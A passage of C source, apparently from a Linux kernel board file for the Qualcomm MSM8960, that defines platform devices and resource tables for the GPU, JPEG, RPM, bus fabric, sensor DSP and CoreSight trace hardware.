.num_levels = ARRAY_SIZE(grp2d_freq) + 1,
.set_grp_async = NULL,
.idle_timeout = HZ/5,
.clk_map = KGSL_CLK_CORE | KGSL_CLK_IFACE,
#ifdef CONFIG_MSM_BUS_SCALING
.bus_scale_table = &grp2d1_bus_scale_pdata,
#endif
.iommu_data = kgsl_2d1_iommu_data,
.iommu_count = ARRAY_SIZE(kgsl_2d1_iommu_data),
.core_info = &grp2d_core_info,
};
struct platform_device msm_kgsl_2d1 = {
.name = "kgsl-2d1",
.id = 1,
.num_resources = ARRAY_SIZE(kgsl_2d1_resources),
.resource = kgsl_2d1_resources,
.dev = {
.platform_data = &kgsl_2d1_pdata,
},
};
#ifdef CONFIG_MSM_GEMINI
static struct msm_bus_vectors gemini_init_vector[] = {
{
.src = MSM_BUS_MASTER_JPEG_ENC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = 0,
},
{
.src = MSM_BUS_MASTER_JPEG_ENC,
.dst = MSM_BUS_SLAVE_MM_IMEM,
.ab = 0,
.ib = 0,
},
};
static struct msm_bus_vectors gemini_encode_vector[] = {
{
.src = MSM_BUS_MASTER_JPEG_ENC,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 540000000,
.ib = 1350000000,
},
{
.src = MSM_BUS_MASTER_JPEG_ENC,
.dst = MSM_BUS_SLAVE_MM_IMEM,
.ab = 43200000,
.ib = 69120000,
},
};
static struct msm_bus_paths gemini_bus_path[] = {
{
ARRAY_SIZE(gemini_init_vector),
gemini_init_vector,
},
{
ARRAY_SIZE(gemini_encode_vector),
gemini_encode_vector,
},
};
static struct msm_bus_scale_pdata gemini_bus_scale_pdata = {
gemini_bus_path,
ARRAY_SIZE(gemini_bus_path),
.name = "msm_gemini",
};
static struct resource msm_gemini_resources[] = {
{
.start = 0x04600000,
.end = 0x04600000 + SZ_1M - 1,
.flags = IORESOURCE_MEM,
},
{
.start = JPEG_IRQ,
.end = JPEG_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm8960_gemini_device = {
.name = "msm_gemini",
.resource = msm_gemini_resources,
.num_resources = ARRAY_SIZE(msm_gemini_resources),
.dev = {
.platform_data = &gemini_bus_scale_pdata,
},
};
#endif
#ifdef CONFIG_MSM_MERCURY
static struct resource msm_mercury_resources[] = {
{
.start = 0x05000000,
.end = 0x05000000 + SZ_1M - 1,
.name = "mercury_resource_base",
.flags = IORESOURCE_MEM,
},
{
.start = JPEGD_IRQ,
.end = JPEGD_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm8960_mercury_device = {
.name = "msm_mercury",
.resource = msm_mercury_resources,
.num_resources = ARRAY_SIZE(msm_mercury_resources),
};
#endif
struct msm_rpm_platform_data msm8960_rpm_data __initdata = {
.reg_base_addrs = {
[MSM_RPM_PAGE_STATUS] = MSM_RPM_BASE,
[MSM_RPM_PAGE_CTRL] = MSM_RPM_BASE + 0x400,
[MSM_RPM_PAGE_REQ] = MSM_RPM_BASE + 0x600,
[MSM_RPM_PAGE_ACK] = MSM_RPM_BASE + 0xa00,
},
.irq_ack = RPM_APCC_CPU0_GP_HIGH_IRQ,
.irq_err = RPM_APCC_CPU0_GP_LOW_IRQ,
.irq_wakeup = RPM_APCC_CPU0_WAKE_UP_IRQ,
.ipc_rpm_reg = MSM_APCS_GCC_BASE + 0x008,
.ipc_rpm_val = 4,
.target_id = {
MSM_RPM_MAP(8960, NOTIFICATION_CONFIGURED_0, NOTIFICATION, 4),
MSM_RPM_MAP(8960, NOTIFICATION_REGISTERED_0, NOTIFICATION, 4),
MSM_RPM_MAP(8960, INVALIDATE_0, INVALIDATE, 8),
MSM_RPM_MAP(8960, TRIGGER_TIMED_TO, TRIGGER_TIMED, 1),
MSM_RPM_MAP(8960, TRIGGER_TIMED_SCLK_COUNT, TRIGGER_TIMED, 1),
MSM_RPM_MAP(8960, RPM_CTL, RPM_CTL, 1),
MSM_RPM_MAP(8960, CXO_CLK, CXO_CLK, 1),
MSM_RPM_MAP(8960, PXO_CLK, PXO_CLK, 1),
MSM_RPM_MAP(8960, APPS_FABRIC_CLK, APPS_FABRIC_CLK, 1),
MSM_RPM_MAP(8960, SYSTEM_FABRIC_CLK, SYSTEM_FABRIC_CLK, 1),
MSM_RPM_MAP(8960, MM_FABRIC_CLK, MM_FABRIC_CLK, 1),
MSM_RPM_MAP(8960, DAYTONA_FABRIC_CLK, DAYTONA_FABRIC_CLK, 1),
MSM_RPM_MAP(8960, SFPB_CLK, SFPB_CLK, 1),
MSM_RPM_MAP(8960, CFPB_CLK, CFPB_CLK, 1),
MSM_RPM_MAP(8960, MMFPB_CLK, MMFPB_CLK, 1),
MSM_RPM_MAP(8960, EBI1_CLK, EBI1_CLK, 1),
MSM_RPM_MAP(8960, APPS_FABRIC_CFG_HALT_0,
APPS_FABRIC_CFG_HALT, 2),
MSM_RPM_MAP(8960, APPS_FABRIC_CFG_CLKMOD_0,
APPS_FABRIC_CFG_CLKMOD, 3),
MSM_RPM_MAP(8960, APPS_FABRIC_CFG_IOCTL,
APPS_FABRIC_CFG_IOCTL, 1),
MSM_RPM_MAP(8960, APPS_FABRIC_ARB_0, APPS_FABRIC_ARB, 12),
MSM_RPM_MAP(8960, SYS_FABRIC_CFG_HALT_0,
SYS_FABRIC_CFG_HALT, 2),
MSM_RPM_MAP(8960, SYS_FABRIC_CFG_CLKMOD_0,
SYS_FABRIC_CFG_CLKMOD, 3),
MSM_RPM_MAP(8960, SYS_FABRIC_CFG_IOCTL,
SYS_FABRIC_CFG_IOCTL, 1),
MSM_RPM_MAP(8960, SYSTEM_FABRIC_ARB_0,
SYSTEM_FABRIC_ARB, 29),
MSM_RPM_MAP(8960, MMSS_FABRIC_CFG_HALT_0,
MMSS_FABRIC_CFG_HALT, 2),
MSM_RPM_MAP(8960, MMSS_FABRIC_CFG_CLKMOD_0,
MMSS_FABRIC_CFG_CLKMOD, 3),
MSM_RPM_MAP(8960, MMSS_FABRIC_CFG_IOCTL,
MMSS_FABRIC_CFG_IOCTL, 1),
MSM_RPM_MAP(8960, MM_FABRIC_ARB_0, MM_FABRIC_ARB, 23),
MSM_RPM_MAP(8960, PM8921_S1_0, PM8921_S1, 2),
MSM_RPM_MAP(8960, PM8921_S2_0, PM8921_S2, 2),
MSM_RPM_MAP(8960, PM8921_S3_0, PM8921_S3, 2),
MSM_RPM_MAP(8960, PM8921_S4_0, PM8921_S4, 2),
MSM_RPM_MAP(8960, PM8921_S5_0, PM8921_S5, 2),
MSM_RPM_MAP(8960, PM8921_S6_0, PM8921_S6, 2),
MSM_RPM_MAP(8960, PM8921_S7_0, PM8921_S7, 2),
MSM_RPM_MAP(8960, PM8921_S8_0, PM8921_S8, 2),
MSM_RPM_MAP(8960, PM8921_L1_0, PM8921_L1, 2),
MSM_RPM_MAP(8960, PM8921_L2_0, PM8921_L2, 2),
MSM_RPM_MAP(8960, PM8921_L3_0, PM8921_L3, 2),
MSM_RPM_MAP(8960, PM8921_L4_0, PM8921_L4, 2),
MSM_RPM_MAP(8960, PM8921_L5_0, PM8921_L5, 2),
MSM_RPM_MAP(8960, PM8921_L6_0, PM8921_L6, 2),
MSM_RPM_MAP(8960, PM8921_L7_0, PM8921_L7, 2),
MSM_RPM_MAP(8960, PM8921_L8_0, PM8921_L8, 2),
MSM_RPM_MAP(8960, PM8921_L9_0, PM8921_L9, 2),
MSM_RPM_MAP(8960, PM8921_L10_0, PM8921_L10, 2),
MSM_RPM_MAP(8960, PM8921_L11_0, PM8921_L11, 2),
MSM_RPM_MAP(8960, PM8921_L12_0, PM8921_L12, 2),
MSM_RPM_MAP(8960, PM8921_L13_0, PM8921_L13, 2),
MSM_RPM_MAP(8960, PM8921_L14_0, PM8921_L14, 2),
MSM_RPM_MAP(8960, PM8921_L15_0, PM8921_L15, 2),
MSM_RPM_MAP(8960, PM8921_L16_0, PM8921_L16, 2),
MSM_RPM_MAP(8960, PM8921_L17_0, PM8921_L17, 2),
MSM_RPM_MAP(8960, PM8921_L18_0, PM8921_L18, 2),
MSM_RPM_MAP(8960, PM8921_L19_0, PM8921_L19, 2),
MSM_RPM_MAP(8960, PM8921_L20_0, PM8921_L20, 2),
MSM_RPM_MAP(8960, PM8921_L21_0, PM8921_L21, 2),
MSM_RPM_MAP(8960, PM8921_L22_0, PM8921_L22, 2),
MSM_RPM_MAP(8960, PM8921_L23_0, PM8921_L23, 2),
MSM_RPM_MAP(8960, PM8921_L24_0, PM8921_L24, 2),
MSM_RPM_MAP(8960, PM8921_L25_0, PM8921_L25, 2),
MSM_RPM_MAP(8960, PM8921_L26_0, PM8921_L26, 2),
MSM_RPM_MAP(8960, PM8921_L27_0, PM8921_L27, 2),
MSM_RPM_MAP(8960, PM8921_L28_0, PM8921_L28, 2),
MSM_RPM_MAP(8960, PM8921_L29_0, PM8921_L29, 2),
MSM_RPM_MAP(8960, PM8921_CLK1_0, PM8921_CLK1, 2),
MSM_RPM_MAP(8960, PM8921_CLK2_0, PM8921_CLK2, 2),
MSM_RPM_MAP(8960, PM8921_LVS1, PM8921_LVS1, 1),
MSM_RPM_MAP(8960, PM8921_LVS2, PM8921_LVS2, 1),
MSM_RPM_MAP(8960, PM8921_LVS3, PM8921_LVS3, 1),
MSM_RPM_MAP(8960, PM8921_LVS4, PM8921_LVS4, 1),
MSM_RPM_MAP(8960, PM8921_LVS5, PM8921_LVS5, 1),
MSM_RPM_MAP(8960, PM8921_LVS6, PM8921_LVS6, 1),
MSM_RPM_MAP(8960, PM8921_LVS7, PM8921_LVS7, 1),
MSM_RPM_MAP(8960, NCP_0, NCP, 2),
MSM_RPM_MAP(8960, CXO_BUFFERS, CXO_BUFFERS, 1),
MSM_RPM_MAP(8960, USB_OTG_SWITCH, USB_OTG_SWITCH, 1),
MSM_RPM_MAP(8960, HDMI_SWITCH, HDMI_SWITCH, 1),
MSM_RPM_MAP(8960, DDR_DMM_0, DDR_DMM, 2),
MSM_RPM_MAP(8960, QDSS_CLK, QDSS_CLK, 1),
},
.target_status = {
MSM_RPM_STATUS_ID_MAP(8960, VERSION_MAJOR),
MSM_RPM_STATUS_ID_MAP(8960, VERSION_MINOR),
MSM_RPM_STATUS_ID_MAP(8960, VERSION_BUILD),
MSM_RPM_STATUS_ID_MAP(8960, SUPPORTED_RESOURCES_0),
MSM_RPM_STATUS_ID_MAP(8960, SUPPORTED_RESOURCES_1),
MSM_RPM_STATUS_ID_MAP(8960, SUPPORTED_RESOURCES_2),
MSM_RPM_STATUS_ID_MAP(8960, RESERVED_SUPPORTED_RESOURCES_0),
MSM_RPM_STATUS_ID_MAP(8960, SEQUENCE),
MSM_RPM_STATUS_ID_MAP(8960, RPM_CTL),
MSM_RPM_STATUS_ID_MAP(8960, CXO_CLK),
MSM_RPM_STATUS_ID_MAP(8960, PXO_CLK),
MSM_RPM_STATUS_ID_MAP(8960, APPS_FABRIC_CLK),
MSM_RPM_STATUS_ID_MAP(8960, SYSTEM_FABRIC_CLK),
MSM_RPM_STATUS_ID_MAP(8960, MM_FABRIC_CLK),
MSM_RPM_STATUS_ID_MAP(8960, DAYTONA_FABRIC_CLK),
MSM_RPM_STATUS_ID_MAP(8960, SFPB_CLK),
MSM_RPM_STATUS_ID_MAP(8960, CFPB_CLK),
MSM_RPM_STATUS_ID_MAP(8960, MMFPB_CLK),
MSM_RPM_STATUS_ID_MAP(8960, EBI1_CLK),
MSM_RPM_STATUS_ID_MAP(8960, APPS_FABRIC_CFG_HALT),
MSM_RPM_STATUS_ID_MAP(8960, APPS_FABRIC_CFG_CLKMOD),
MSM_RPM_STATUS_ID_MAP(8960, APPS_FABRIC_CFG_IOCTL),
MSM_RPM_STATUS_ID_MAP(8960, APPS_FABRIC_ARB),
MSM_RPM_STATUS_ID_MAP(8960, SYS_FABRIC_CFG_HALT),
MSM_RPM_STATUS_ID_MAP(8960, SYS_FABRIC_CFG_CLKMOD),
MSM_RPM_STATUS_ID_MAP(8960, SYS_FABRIC_CFG_IOCTL),
MSM_RPM_STATUS_ID_MAP(8960, SYSTEM_FABRIC_ARB),
MSM_RPM_STATUS_ID_MAP(8960, MMSS_FABRIC_CFG_HALT),
MSM_RPM_STATUS_ID_MAP(8960, MMSS_FABRIC_CFG_CLKMOD),
MSM_RPM_STATUS_ID_MAP(8960, MMSS_FABRIC_CFG_IOCTL),
MSM_RPM_STATUS_ID_MAP(8960, MM_FABRIC_ARB),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S1_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S1_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S2_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S2_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S3_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S3_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S4_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S4_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S5_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S5_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S6_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S6_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S7_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S7_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S8_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_S8_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L1_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L1_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L2_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L2_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L3_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L3_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L4_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L4_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L5_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L5_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L6_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L6_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L7_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L7_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L8_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L8_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L9_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L9_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L10_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L10_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L11_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L11_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L12_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L12_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L13_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L13_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L14_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L14_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L15_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L15_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L16_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L16_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L17_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L17_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L18_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L18_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L19_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L19_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L20_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L20_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L21_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L21_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L22_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L22_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L23_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L23_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L24_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L24_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L25_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L25_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L26_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L26_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L27_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L27_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L28_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L28_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L29_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_L29_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_CLK1_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_CLK1_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_CLK2_0),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_CLK2_1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_LVS1),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_LVS2),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_LVS3),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_LVS4),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_LVS5),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_LVS6),
MSM_RPM_STATUS_ID_MAP(8960, PM8921_LVS7),
MSM_RPM_STATUS_ID_MAP(8960, NCP_0),
MSM_RPM_STATUS_ID_MAP(8960, NCP_1),
MSM_RPM_STATUS_ID_MAP(8960, CXO_BUFFERS),
MSM_RPM_STATUS_ID_MAP(8960, USB_OTG_SWITCH),
MSM_RPM_STATUS_ID_MAP(8960, HDMI_SWITCH),
MSM_RPM_STATUS_ID_MAP(8960, DDR_DMM_0),
MSM_RPM_STATUS_ID_MAP(8960, DDR_DMM_1),
MSM_RPM_STATUS_ID_MAP(8960, EBI1_CH0_RANGE),
MSM_RPM_STATUS_ID_MAP(8960, EBI1_CH1_RANGE),
},
.target_ctrl_id = {
MSM_RPM_CTRL_MAP(8960, VERSION_MAJOR),
MSM_RPM_CTRL_MAP(8960, VERSION_MINOR),
MSM_RPM_CTRL_MAP(8960, VERSION_BUILD),
MSM_RPM_CTRL_MAP(8960, REQ_CTX_0),
MSM_RPM_CTRL_MAP(8960, REQ_SEL_0),
MSM_RPM_CTRL_MAP(8960, ACK_CTX_0),
MSM_RPM_CTRL_MAP(8960, ACK_SEL_0),
},
.sel_invalidate = MSM_RPM_8960_SEL_INVALIDATE,
.sel_notification = MSM_RPM_8960_SEL_NOTIFICATION,
.sel_last = MSM_RPM_8960_SEL_LAST,
.ver = {3, 0, 0},
};
struct platform_device msm8960_rpm_device = {
.name = "msm_rpm",
.id = -1,
};
static struct msm_rpm_log_platform_data msm_rpm_log_pdata = {
.phys_addr_base = 0x0010C000,
.reg_offsets = {
[MSM_RPM_LOG_PAGE_INDICES] = 0x00000080,
[MSM_RPM_LOG_PAGE_BUFFER] = 0x000000A0,
},
.phys_size = SZ_8K,
.log_len = 4096, /* log's buffer length in bytes */
.log_len_mask = (4096 >> 2) - 1, /* length mask in units of u32 */
};
struct platform_device msm8960_rpm_log_device = {
.name = "msm_rpm_log",
.id = -1,
.dev = {
.platform_data = &msm_rpm_log_pdata,
},
};
static struct msm_rpmstats_platform_data msm_rpm_stat_pdata = {
.phys_addr_base = 0x0010DD04,
.phys_size = SZ_256,
};
struct platform_device msm8960_rpm_stat_device = {
.name = "msm_rpm_stat",
.id = -1,
.dev = {
.platform_data = &msm_rpm_stat_pdata,
},
};
static struct resource resources_rpm_master_stats[] = {
{
.start = MSM8960_RPM_MASTER_STATS_BASE,
.end = MSM8960_RPM_MASTER_STATS_BASE + SZ_256,
.flags = IORESOURCE_MEM,
},
};
static char *master_names[] = {
"KPSS",
"GPSS",
"LPASS",
"RIVA",
"DSPS",
};
static struct msm_rpm_master_stats_platform_data msm_rpm_master_stat_pdata = {
.masters = master_names,
.nomasters = ARRAY_SIZE(master_names),
};
struct platform_device msm8960_rpm_master_stat_device = {
.name = "msm_rpm_master_stat",
.id = -1,
.num_resources = ARRAY_SIZE(resources_rpm_master_stats),
.resource = resources_rpm_master_stats,
.dev = {
.platform_data = &msm_rpm_master_stat_pdata,
},
};
struct platform_device msm_bus_sys_fabric = {
.name = "msm_bus_fabric",
.id = MSM_BUS_FAB_SYSTEM,
};
struct platform_device msm_bus_apps_fabric = {
.name = "msm_bus_fabric",
.id = MSM_BUS_FAB_APPSS,
};
struct platform_device msm_bus_mm_fabric = {
.name = "msm_bus_fabric",
.id = MSM_BUS_FAB_MMSS,
};
struct platform_device msm_bus_sys_fpb = {
.name = "msm_bus_fabric",
.id = MSM_BUS_FAB_SYSTEM_FPB,
};
struct platform_device msm_bus_cpss_fpb = {
.name = "msm_bus_fabric",
.id = MSM_BUS_FAB_CPSS_FPB,
};
/* Sensors DSPS platform data */
#ifdef CONFIG_MSM_DSPS
#define PPSS_DSPS_TCM_CODE_BASE 0x12000000
#define PPSS_DSPS_TCM_CODE_SIZE 0x28000
#define PPSS_DSPS_TCM_BUF_BASE 0x12040000
#define PPSS_DSPS_TCM_BUF_SIZE 0x4000
#define PPSS_DSPS_PIPE_BASE 0x12800000
#define PPSS_DSPS_PIPE_SIZE 0x4000
#define PPSS_DSPS_DDR_BASE 0x8fe00000
#define PPSS_DSPS_DDR_SIZE 0x100000
#define PPSS_SMEM_BASE 0x80000000
#define PPSS_SMEM_SIZE 0x200000
#define PPSS_REG_PHYS_BASE 0x12080000
#define PPSS_WDOG_UNMASKED_INT_EN 0x1808
static struct dsps_clk_info dsps_clks[] = {};
static struct dsps_regulator_info dsps_regs[] = {};
/*
* Note: GPIOs field is intialized in run-time at the function
* msm8960_init_dsps().
*/
struct msm_dsps_platform_data msm_dsps_pdata = {
.clks = dsps_clks,
.clks_num = ARRAY_SIZE(dsps_clks),
.gpios = NULL,
.gpios_num = 0,
.regs = dsps_regs,
.regs_num = ARRAY_SIZE(dsps_regs),
.dsps_pwr_ctl_en = 1,
.tcm_code_start = PPSS_DSPS_TCM_CODE_BASE,
.tcm_code_size = PPSS_DSPS_TCM_CODE_SIZE,
.tcm_buf_start = PPSS_DSPS_TCM_BUF_BASE,
.tcm_buf_size = PPSS_DSPS_TCM_BUF_SIZE,
.pipe_start = PPSS_DSPS_PIPE_BASE,
.pipe_size = PPSS_DSPS_PIPE_SIZE,
.ddr_start = PPSS_DSPS_DDR_BASE,
.ddr_size = PPSS_DSPS_DDR_SIZE,
.smem_start = PPSS_SMEM_BASE,
.smem_size = PPSS_SMEM_SIZE,
.ppss_wdog_unmasked_int_en_reg = PPSS_WDOG_UNMASKED_INT_EN,
.signature = DSPS_SIGNATURE,
};
static struct resource msm_dsps_resources[] = {
{
.start = PPSS_REG_PHYS_BASE,
.end = PPSS_REG_PHYS_BASE + SZ_8K - 1,
.name = "ppss_reg",
.flags = IORESOURCE_MEM,
},
{
.start = PPSS_WDOG_TIMER_IRQ,
.end = PPSS_WDOG_TIMER_IRQ,
.name = "ppss_wdog",
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm_dsps_device = {
.name = "msm_dsps",
.id = 0,
.num_resources = ARRAY_SIZE(msm_dsps_resources),
.resource = msm_dsps_resources,
.dev.platform_data = &msm_dsps_pdata,
};
#endif /* CONFIG_MSM_DSPS */
#define CORESIGHT_PHYS_BASE 0x01A00000
#define CORESIGHT_TPIU_PHYS_BASE (CORESIGHT_PHYS_BASE + 0x3000)
#define CORESIGHT_ETB_PHYS_BASE (CORESIGHT_PHYS_BASE + 0x1000)
#define CORESIGHT_FUNNEL_PHYS_BASE (CORESIGHT_PHYS_BASE + 0x4000)
#define CORESIGHT_STM_PHYS_BASE (CORESIGHT_PHYS_BASE + 0x6000)
#define CORESIGHT_ETM0_PHYS_BASE (CORESIGHT_PHYS_BASE + 0x1C000)
#define CORESIGHT_ETM1_PHYS_BASE (CORESIGHT_PHYS_BASE + 0x1D000)
#define CORESIGHT_STM_CHANNEL_PHYS_BASE (0x14000000 + 0x280000)
static struct resource coresight_tpiu_resources[] = {
{
.start = CORESIGHT_TPIU_PHYS_BASE,
.end = CORESIGHT_TPIU_PHYS_BASE + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
};
static struct coresight_platform_data coresight_tpiu_pdata = {
.id = 0,
.name = "coresight-tpiu",
.nr_inports = 1,
.nr_outports = 0,
};
struct platform_device coresight_tpiu_device = {
.name = "coresight-tpiu",
.id = 0,
.num_resources = ARRAY_SIZE(coresight_tpiu_resources),
.resource = coresight_tpiu_resources,
.dev = {
.platform_data = &coresight_tpiu_pdata,
},
};
static struct resource coresight_etb_resources[] = {
{
.start = CORESIGHT_ETB_PHYS_BASE,
.end = CORESIGHT_ETB_PHYS_BASE + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
};
static struct coresight_platform_data coresight_etb_pdata = {
.id = 1,
.name = "coresight-etb",
.nr_inports = 1,
.nr_outports = 0,
.default_sink = true,
};
struct platform_device coresight_etb_device = {
.name = "coresight-etb",
.id = 0,
.num_resources = ARRAY_SIZE(coresight_etb_resources),
.resource = coresight_etb_resources,
.dev = {
.platform_data = &coresight_etb_pdata,
},
};
static struct resource coresight_funnel_resources[] = {
{
.start = CORESIGHT_FUNNEL_PHYS_BASE,
.end = CORESIGHT_FUNNEL_PHYS_BASE + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
};
static const int coresight_funnel_outports[] = { 0, 1 };
static const int coresight_funnel_child_ids[] = { 0, 1 };
static const int coresight_funnel_child_ports[] = { 0, 0 };
static struct coresight_platform_data coresight_funnel_pdata = {
.id = 2,
.name = "coresight-funnel",
.nr_inports = 4,
.outports = coresight_funnel_outports,
.child_ids = coresight_funnel_child_ids,
.child_ports = coresight_funnel_child_ports,
.nr_outports = ARRAY_SIZE(coresight_funnel_outports),
};
struct platform_device coresight_funnel_device = {
.name = "coresight-funnel",
.id = 0,
.num_resources = ARRAY_SIZE(coresight_funnel_resources),
.resource = coresight_funnel_resources,
.dev = {
.platform_data = &coresight_funnel_pdata,
},
};
static struct resource coresight_stm_resources[] = {
{
.start = CORESIGHT_STM_PHYS_BASE,
.end = CORESIGHT_STM_PHYS_BASE + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
{
.start = CORESIGHT_STM_CHANNEL_PHYS_BASE,
.end = CORESIGHT_STM_CHANNEL_PHYS_BASE + SZ_1M + SZ_512K - 1,
.flags = IORESOURCE_MEM,
},
};
static const int coresight_stm_outports[] = { 0 };
static const int coresight_stm_child_ids[] = { 2 };
static const int coresight_stm_child_ports[] = { 2 };
static struct coresight_platform_data coresight_stm_pdata = {
.id = 3,
.name = "coresight-stm",
.nr_inports = 0,
.outports = coresight_stm_outports,
.child_ids = coresight_stm_child_ids,
.child_ports = coresight_stm_child_ports,
.nr_outports = ARRAY_SIZE(coresight_stm_outports),
};
struct platform_device coresight_stm_device = {
.name = "coresight-stm",
.id = 0,
.num_resources = ARRAY_SIZE(coresight_stm_resources),
.resource = coresight_stm_resources,
.dev = {
.platform_data = &coresight_stm_pdata,
},
};
static struct resource coresight_etm0_resources[] = {
{
.start = CORESIGHT_ETM0_PHYS_BASE,
.end = CORESIGHT_ETM0_PHYS_BASE + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
};
static const int coresight_etm0_outports[] = { 0 };
static const int coresight_etm0_child_ids[] = { 2 };
static const int coresight_etm0_child_ports[] = { 0 };
static struct coresight_platform_data coresight_etm0_pdata = {
.id = 4,
.name = "coresight-etm0",
.nr_inports = 0,
.outports = coresight_etm0_outports,
.child_ids = coresight_etm0_child_ids,
.child_ports = coresight_etm0_child_ports,
.nr_outports = ARRAY_SIZE(coresight_etm0_outports),
};
struct platform_device coresight_etm0_device = {
.name = "coresight-etm",
.id = 0,
.num_resources = ARRAY_SIZE(coresight_etm0_resources),
.resource = coresight_etm0_resources,
.dev = {
.platform_data = &coresight_etm0_pdata,
},
};
static struct resource coresight_etm1_resources[] = {
{
.start = CORESIGHT_ETM1_PHYS_BASE,
.end = CORESIGHT_ETM1_PHYS_BASE + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
};
static const int coresight_etm1_outports[] = { 0 };
static const int coresight_etm1_child_ids[] = { 2 };
static const int coresight_etm1_child_ports[] = { 1 };
static struct coresight_platform_data coresight_etm1_pdata = {
.id = 5,
.name = "coresight-etm1",
.nr_inports = 0,
.outports = coresight_etm1_outports,
.child_ids = coresight_etm1_child_ids,
.child_ports = coresight_etm1_child_ports,
.nr_outports = ARRAY_SIZE(coresight_etm1_outports),
};
struct platform_device coresight_etm1_device = {
.name = "coresight-etm",
.id = 1,
.num_resources = ARRAY_SIZE(coresight_etm1_resources),
.resource = coresight_etm1_resources,
.dev = {
.platform_data = &coresight_etm1_pdata,
},
};
static struct resource msm_ebi1_ch0_erp_resources[] = {
{
.start = HSDDRX_EBI1CH0_IRQ,
